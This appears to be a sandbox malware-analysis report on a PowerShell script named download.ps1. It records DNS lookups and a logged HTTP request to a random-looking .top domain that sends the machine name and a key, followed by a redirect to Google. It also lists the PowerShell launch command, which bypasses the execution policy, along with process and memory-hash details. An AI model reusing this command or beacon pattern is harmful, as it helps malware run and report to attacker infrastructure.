                                                                                                                                Dec 20, 2024 17:34:58.369189024 CET192.168.2.71.1.1.10x3184Standard query (0)cmacnnkfbhlcncm.topA (IP address)IN (0x0001)false
                                                                                                                                Dec 20, 2024 17:35:00.045572042 CET192.168.2.71.1.1.10x6b98Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Dec 20, 2024 17:34:58.583211899 CET1.1.1.1192.168.2.70x3184No error (0)cmacnnkfbhlcncm.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                                                Dec 20, 2024 17:35:00.182825089 CET1.1.1.1192.168.2.70x6b98No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                • cmacnnkfbhlcncm.top
                                                                                                                                • www.google.com
                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.74970045.61.136.13880644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 20, 2024 17:34:58.727257967 CET220OUTGET /4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527 HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                Host: cmacnnkfbhlcncm.top
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 20, 2024 17:35:00.044008017 CET166INHTTP/1.1 302 Found
                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                Date: Fri, 20 Dec 2024 16:34:59 GMT
                                                                                                                                Content-Length: 0
                                                                                                                                Connection: keep-alive
                                                                                                                                Location: http://www.google.com


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.749701142.250.181.13280644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 20, 2024 17:35:00.305747032 CET159OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                Host: www.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 20, 2024 17:35:02.113485098 CET1236INHTTP/1.1 200 OK
                                                                                                                                Date: Fri, 20 Dec 2024 16:35:01 GMT
                                                                                                                                Expires: -1
                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-q0Qh02Fx1ZnHOkNjcAOMoA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                Server: gws
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                Set-Cookie: AEC=AZ6Zc-UuwSqp7jMCpK3Q7KQmFGwbwfDATqpZ2DCKsn6ORyXfP56qtTyG_4Y; expires=Wed, 18-Jun-2025 16:35:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                Set-Cookie: NID=520=aTIcA8crpYEB7IB6vvXsUR6C-Xm9ccJiDEy38Fof5DTpwmnmEtEpQO6LCpaa8MyPdIjS6YT7aesJmo6eeyIpoc-4lKojs2giYNheQ8fYtNt7g-y1b585f-ejbprZkhpUr64RwNAyPAo8UqAAB0AOz-qT1PZXbkktOBXLxMOgV_OxmTSHLFJ9_xDsTqGU4Gndn6ZTF8I_Yw; expires=Sat, 21-Jun-2025 16:35:01 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                Accept-Ranges: none
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Data Raw: 34 39 62 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73
                                                                                                                                Data Ascii: 49b6<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images
                                                                                                                                Dec 20, 2024 17:35:02.113584042 CET1236INData Raw: 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20
                                                                                                                                Data Ascii: , videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/
                                                                                                                                Dec 20, 2024 17:35:02.113621950 CET1236INData Raw: 22 71 30 51 68 30 32 46 78 31 5a 6e 48 4f 6b 4e 6a 63 41 4f 4d 6f 41 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 74 5a 78 6c 5a 39 66 30 49 39 71 38 30 2d 6b 50 78 50 66 6c 30 41 49 27 2c 6b 45 58 50 49 3a 27
                                                                                                                                Data Ascii: "q0Qh02Fx1ZnHOkNjcAOMoA">(function(){var _g={kEI:'tZxlZ9f0I9q80-kPxPfl0AI',kEXPI:'0,202747,606134,2891371,1132,541533,2891,8348,159026,256416,10161,45786,9779,68707,30697,3801,2412,50869,7734,6626,1,12047,20674,1428,87,117,29279,27083,5213672,
                                                                                                                                Dec 20, 2024 17:35:02.113723040 CET1236INData Raw: 36 2c 35 30 2c 31 2c 36 2c 31 30 39 31 2c 33 33 2c 31 30 39 2c 35 37 30 2c 33 32 2c 32 32 34 2c 32 34 34 2c 32 35 32 2c 37 38 2c 33 36 32 2c 36 31 2c 33 31 31 2c 31 32 31 2c 33 33 39 2c 31 34 33 2c 33 34 35 2c 34 36 35 2c 36 36 35 2c 31 32 39 32
                                                                                                                                Data Ascii: 6,50,1,6,1091,33,109,570,32,224,244,252,78,362,61,311,121,339,143,345,465,665,1292,4450,733,149,2,21349008,37198,18,2780,704,866,4392,845,48,155,553,1774,8,772,1293,3,1207,592,17,294,602,5985129,2038088',kBL:'bBJX',kOPI:89978449};(function(){v
                                                                                                                                Dec 20, 2024 17:35:02.113758087 CET1236INData Raw: 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20
                                                                                                                                Data Ascii: e.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call
                                                                                                                                Dec 20, 2024 17:35:02.113794088 CET1236INData Raw: 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 61 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 69 66 28 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 41 22 29 7b 61 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 68 72 65
                                                                                                                                Data Ascii: documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white
                                                                                                                                Dec 20, 2024 17:35:02.113828897 CET1236INData Raw: 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 72 74 6c 20 2e 67 62 6d 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 31 70 78 20 31 70 78 20 31 70
                                                                                                                                Data Ascii: 0,0,.2);box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;position:absolut
                                                                                                                                Dec 20, 2024 17:35:02.114182949 CET1236INData Raw: 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 7a 74 2c 2e 67 62 67 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 64
                                                                                                                                Data Ascii: ox-shadow:0 2px 4px rgba(0,0,0,.2)}.gbzt,.gbgt{cursor:pointer;display:block;text-decoration:none !important}span#gbg6,span#gbg4{cursor:default}.gbts{border-left:1px solid transparent;border-right:1px solid transparent;display:block;*display:in
                                                                                                                                Dec 20, 2024 17:35:02.114217043 CET1236INData Raw: 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 23 67 62 67 36 2e 67 62 67 74 2d 68 76 72 2c 23 67 62 67 36 2e 67 62 67 74 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 61 63
                                                                                                                                Data Ascii: {font-weight:bold}#gbg6.gbgt-hvr,#gbg6.gbgt:focus{background-color:transparent;background-image:none}.gbg4a{font-size:0;line-height:0}.gbg4a .gbts{padding:27px 5px 0;*padding:25px 5px 0}.gbto .gbg4a .gbts{padding:29px 5px 1px;*padding:27px 5px
                                                                                                                                Dec 20, 2024 17:35:02.114264965 CET1236INData Raw: 20 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 67 62 6d
                                                                                                                                Data Ascii: !important;text-decoration:none !important}.gbmt,.gbmt:visited{display:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:visited{padd
                                                                                                                                Dec 20, 2024 17:35:02.233639002 CET1236INData Raw: 7d 2e 47 42 4d 43 43 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 23 47 42 4d 50 41 4c 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 5c 30 41 5c 30 41 27 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65
                                                                                                                                Data Ascii: }.GBMCC:last-child:after,#GBMPAL:last-child:after{content:'\0A\0A';white-space:pre;position:absolute}#gbmps{*zoom:1}#gbd4 .gbpc,#gbmpas .gbmt{line-height:17px}#gbd4 .gbpgs .gbmtc{line-height:27px}#gbd4 .gbmtc{border-bottom:1px solid #bebebe}#g


                                                                                                                                Click to jump to process

                                                                                                                                Click to jump to process

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Click to jump to process

                                                                                                                                Target ID:0
                                                                                                                                Start time:11:34:50
                                                                                                                                Start date:20/12/2024
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                                Imagebase:0x7ff741d30000
                                                                                                                                File size:452'608 bytes
                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:1
                                                                                                                                Start time:11:34:50
                                                                                                                                Start date:20/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Reset < >
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 46edf4861deb93ee85c1713013f638b9e232984af3ebd1fb748f65a1adb5390c
                                                                                                                                  • Instruction ID: b1ef69953a0f9642fc041968d7375bab8e31e5ac3a489d056a63334426c5662c
                                                                                                                                  • Opcode Fuzzy Hash: 46edf4861deb93ee85c1713013f638b9e232984af3ebd1fb748f65a1adb5390c
                                                                                                                                  • Instruction Fuzzy Hash: 77F18030909A8E8FEBA8DF28C8597F977E1FF55310F04826AE85DC7291DF3499458B81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cba91584c085e51aa9d577b06d1e575793293f8d6c841d5dc33365002982e4d4
                                                                                                                                  • Instruction ID: 08678478306671557e96ee74c5859aa9004e6b433b626d62b0c97dcba130a599
                                                                                                                                  • Opcode Fuzzy Hash: cba91584c085e51aa9d577b06d1e575793293f8d6c841d5dc33365002982e4d4
                                                                                                                                  • Instruction Fuzzy Hash: 2AE1B130909A8E8FEBA8DF28C8597F977E1FF55310F14826AD85DC7291DA34E9448BC1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1437971389.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac6c0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: /$/$/
                                                                                                                                  • API String ID: 0-844086808
                                                                                                                                  • Opcode ID: e741d7398572e5a356ef21c361fb6c635c9fa188a9510184bd45059c99b08f9d
                                                                                                                                  • Instruction ID: c2a18e8d8d562600f0bf7891d828d5e38a083dfbb40f2cb3345c9d2c55e31901
                                                                                                                                  • Opcode Fuzzy Hash: e741d7398572e5a356ef21c361fb6c635c9fa188a9510184bd45059c99b08f9d
                                                                                                                                  • Instruction Fuzzy Hash: A2C11662A0DB898FF797DB2884555747BE1EF66211F1461BEE04DC71A3EE28EC0983C1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1437971389.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac6c0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: /$/
                                                                                                                                  • API String ID: 0-972056843
                                                                                                                                  • Opcode ID: 1bdd2147675d0b634fa7966663618b74b2f482ddc725936748ebccfc6fa2547a
                                                                                                                                  • Instruction ID: fa60643147a73c58cc09f4454d0411c4cb3cf4beb8432c015ee78be3e98e1c82
                                                                                                                                  • Opcode Fuzzy Hash: 1bdd2147675d0b634fa7966663618b74b2f482ddc725936748ebccfc6fa2547a
                                                                                                                                  • Instruction Fuzzy Hash: 6F71477290DB898FF797DB6884491747BD1EF66311B1861BED04DC71A2EE28DC0987C1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6
                                                                                                                                  • API String ID: 0-1452363761
                                                                                                                                  • Opcode ID: 67da24d2f3c3ca1cb6f3a7d283b8f62abf210e2c1b7d9fe3998fe53658283f35
                                                                                                                                  • Instruction ID: f25ae744f4561050448b8e0de212ed3bac104d62c2ba88b80be8dd693ab5d594
                                                                                                                                  • Opcode Fuzzy Hash: 67da24d2f3c3ca1cb6f3a7d283b8f62abf210e2c1b7d9fe3998fe53658283f35
                                                                                                                                  • Instruction Fuzzy Hash: E312B330A18A598FEF88DF5CC495AA9BBE1FF69314F14416DD40EC7296CA34E885CBC1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6
                                                                                                                                  • API String ID: 0-1452363761
                                                                                                                                  • Opcode ID: 9835c8aec1abf59f4f9febf0e475ae110d9f9801cf7f8d27339a6bbebec3c0d5
                                                                                                                                  • Instruction ID: 9c3d3ab87e60a0e8899d15b2e003deacd887a94ea9a69901dc76cea7e227f62d
                                                                                                                                  • Opcode Fuzzy Hash: 9835c8aec1abf59f4f9febf0e475ae110d9f9801cf7f8d27339a6bbebec3c0d5
                                                                                                                                  • Instruction Fuzzy Hash: A5F1B130A18A49CFEB99DF58C485EA97BE1FF99304F54416AD40DD7296CA34E886CBC0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 8h
                                                                                                                                  • API String ID: 0-2550175997
                                                                                                                                  • Opcode ID: 736af0654443e4d4e7018ce34a1a167fe19fa9ff6640201659dfd4d8426a71eb
                                                                                                                                  • Instruction ID: e2295bc90556dfb695c50b52fe0edc267f848e7f81d632e3363060a98dbf928d
                                                                                                                                  • Opcode Fuzzy Hash: 736af0654443e4d4e7018ce34a1a167fe19fa9ff6640201659dfd4d8426a71eb
                                                                                                                                  • Instruction Fuzzy Hash: 9CE1363090DA498FEB59DF1CC885AA57BE1FF5A314F1481BAE04ED7296DA24EC46C7C0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f3116c90203f6992768441c35d636fe399c274e8710e4aaba7f36efbdb2c36db
                                                                                                                                  • Instruction ID: 945736ee089b68ec27aba0d196df108e037bd57935800f4587cb1affba20d253
                                                                                                                                  • Opcode Fuzzy Hash: f3116c90203f6992768441c35d636fe399c274e8710e4aaba7f36efbdb2c36db
                                                                                                                                  • Instruction Fuzzy Hash: 8A81F67180EB888FE7699B68581D5B57FA0EF66314F0881BFE08D97197CA14A90887C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 974cb8c845b072bae59e36e581a8d362d2be26cf6c4646730a82910dc4525eea
                                                                                                                                  • Instruction ID: e34e94d75583464128a4eecbeecf02cf339834dd38740bc32464104d9d01f3b8
                                                                                                                                  • Opcode Fuzzy Hash: 974cb8c845b072bae59e36e581a8d362d2be26cf6c4646730a82910dc4525eea
                                                                                                                                  • Instruction Fuzzy Hash: 24B1B570509A8D8FEBA9DF28C8557F93BD1FF55310F04826AE84DC7292CA349945CB86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 735d580432cb50005971eb975777085c00af68fd8553d098c21fa1941d6ecc4c
                                                                                                                                  • Instruction ID: 8b09008865f9fe90724d89e792a3b4f248377212b4500770aebe4bcd7ea50478
                                                                                                                                  • Opcode Fuzzy Hash: 735d580432cb50005971eb975777085c00af68fd8553d098c21fa1941d6ecc4c
                                                                                                                                  • Instruction Fuzzy Hash: 8351177190DBC88FE71A9B2C98196B97FE0EF56314F0441AFE08CD7197CA24A949C7C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1433381319.00007FFAAC35D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC35D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac35d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: acebee4a6d3c83f8a069330c3ed097b748170d3679d1f51c1d61fdc0e2695331
                                                                                                                                  • Instruction ID: ddc61402e517305e14e57dfeac794ef472329bf873c5068e3244ce9ed3d04643
                                                                                                                                  • Opcode Fuzzy Hash: acebee4a6d3c83f8a069330c3ed097b748170d3679d1f51c1d61fdc0e2695331
                                                                                                                                  • Instruction Fuzzy Hash: 0741167140DBC48FE3568B2898499527FF0EF53260B1505DFD088CB1A3D629EC4AC7E2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fdee8dd71bbc458b00b4788d326c0f91d83ec72fc56d0c2de61ba36963d68a45
                                                                                                                                  • Instruction ID: 0a75df5b96ed34cc43abef02b997fe85d1b769c95b151af9455e96ac094a1e91
                                                                                                                                  • Opcode Fuzzy Hash: fdee8dd71bbc458b00b4788d326c0f91d83ec72fc56d0c2de61ba36963d68a45
                                                                                                                                  • Instruction Fuzzy Hash: 6D314E70A189198FEF98EF58D445EE977E1FF69304F24416AE40ED7296CE24EC818BC4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e6d02c0854352998a22f07cda7e4080e02da9f83bd96f87ace300fc1d5a7ebe0
                                                                                                                                  • Instruction ID: 28a91110c0e45bbad7438d935f30432f63d6959491890b93ac5edc12a7d2c3f1
                                                                                                                                  • Opcode Fuzzy Hash: e6d02c0854352998a22f07cda7e4080e02da9f83bd96f87ace300fc1d5a7ebe0
                                                                                                                                  • Instruction Fuzzy Hash: 9421073090CB4C8FDB59DFAC984A7E97FE0EB96321F04826BD44DC3152DA74945ACB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 076c832df77ca47a1681688b66ced57a69006dc8b533476611721c261bd966c2
                                                                                                                                  • Instruction ID: c34063ea298709d12569933ae173468d4422b7ec1a8068ca09817ae80ab196d4
                                                                                                                                  • Opcode Fuzzy Hash: 076c832df77ca47a1681688b66ced57a69006dc8b533476611721c261bd966c2
                                                                                                                                  • Instruction Fuzzy Hash: 0131183081A65ECFFBB4EB14CC4ABF932D0FF42318F408539D40D86092DA39AA89CB45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3e327091e658c08c194f45f753c311bc03f861fc2c3b965d6e631da5b7fea7c3
                                                                                                                                  • Instruction ID: 6834811277435d4f8ec53fc95fd05099730ac6aca9c2d1ea94a004466efc43f5
                                                                                                                                  • Opcode Fuzzy Hash: 3e327091e658c08c194f45f753c311bc03f861fc2c3b965d6e631da5b7fea7c3
                                                                                                                                  • Instruction Fuzzy Hash: D2014E72B1CB044FE758DE1CA8854A177D1D795320F10053ED0CAC3397D922EC478781
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d59e4eb7c371b3986a24ff2f7eba5badb208033cfd86feb3444ef1584906f3c2
                                                                                                                                  • Instruction ID: 26819e8c9ef94eff4ede27d35892e635590bae6da0b77562b494be2323d4bc5b
                                                                                                                                  • Opcode Fuzzy Hash: d59e4eb7c371b3986a24ff2f7eba5badb208033cfd86feb3444ef1584906f3c2
                                                                                                                                  • Instruction Fuzzy Hash: 0201677111CB0C8FDB44EF0CE451AA9B7E0FB95364F10056DE58AC3665D636E881CB45
                                                                                                                                  Memory Dump Source
